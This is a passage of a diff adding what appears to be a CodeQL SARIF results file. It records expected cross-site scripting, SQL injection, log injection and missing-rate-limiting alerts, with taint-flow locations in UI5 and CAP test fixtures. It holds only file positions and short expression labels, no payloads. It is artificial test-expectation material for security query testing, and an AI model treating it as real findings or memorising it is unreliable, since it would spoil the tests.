+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 4, + "startColumn" : 20, + "endColumn" : 25 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "6311a9ed7e4091a4:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 4, + "startColumn" : 20, + "endColumn" : 25 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... 
param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 4, + "startColumn" : 20, + "endColumn" : 25 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 11, + "startColumn" : 20, + "endColumn" : 25 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "8e517fc6fdf32a1a:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 11, + "startColumn" : 20, + "endColumn" : 25 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + 
"index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 19, + "startColumn" : 20, + "endColumn" : 26 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "c51cf11a085c01f4:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 18, + "endColumn" : 45 + } + }, + 
"message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 19, + "startColumn" : 20, + "endColumn" : 26 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 27, + "startColumn" : 20, + "endColumn" : 26 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e309bf8540256a05:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 25, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 25, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 26, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 26, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... 
(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 26, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 27, + "startColumn" : 20, + "endColumn" : 26 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 25, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/missing-rate-limiting", + "rule" : { + "id" : "js/missing-rate-limiting", + "index" : 68, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "This route handler performs [a database access](1), but is not rate-limited." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 40, + "startColumn" : 25, + "endLine" : 44, + "endColumn" : 8 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "ac6d3bdd3d52ea9b:1", + "primaryLocationStartColumnFingerprint" : "18" + }, + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 9, + "endLine" : 43, + "endColumn" : 11 + } + }, + "message" : { + "text" : "a database access" + } + } ] + }, { + "ruleId" : "js/sql-injection", + "rule" : { + "id" : "js/sql-injection", + "index" : 78, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "This query string depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "4fc3122b51f477a1:1", + "primaryLocationStartColumnFingerprint" : "11" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 26, + "startColumn" : 19, + "endColumn" : 36 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "ccc6f77c65eccb45:1", + "primaryLocationStartColumnFingerprint" : "12" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 54 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 26, + "startColumn" : 32, + "endColumn" : 36 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 26, + "startColumn" : 19, + "endColumn" : 36 + } + }, + "message" : { + "text" : "\"console:\" + book" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 7, + "startColumn" : 18, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "be9a18716e55d497:1", + "primaryLocationStartColumnFingerprint" : "13" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 7, + "startColumn" : 18, + "endColumn" : 41 + } + }, + "message" : { + "text" : "`[INFO] ... 
value}`" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 15, + "startColumn" : 18, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "be9a18716e55d497:2", + "primaryLocationStartColumnFingerprint" : "13" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... 
, true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 15, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 15, + "startColumn" : 18, + "endColumn" : 41 + } + }, + "message" : { + "text" : "`[INFO] ... value}`" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 24, + "startColumn" : 18, + "endColumn" : 42 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e197b363f9dc3962:1", + "primaryLocationStartColumnFingerprint" : "13" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... 
, true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 24, + "startColumn" : 34, + "endColumn" : 40 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 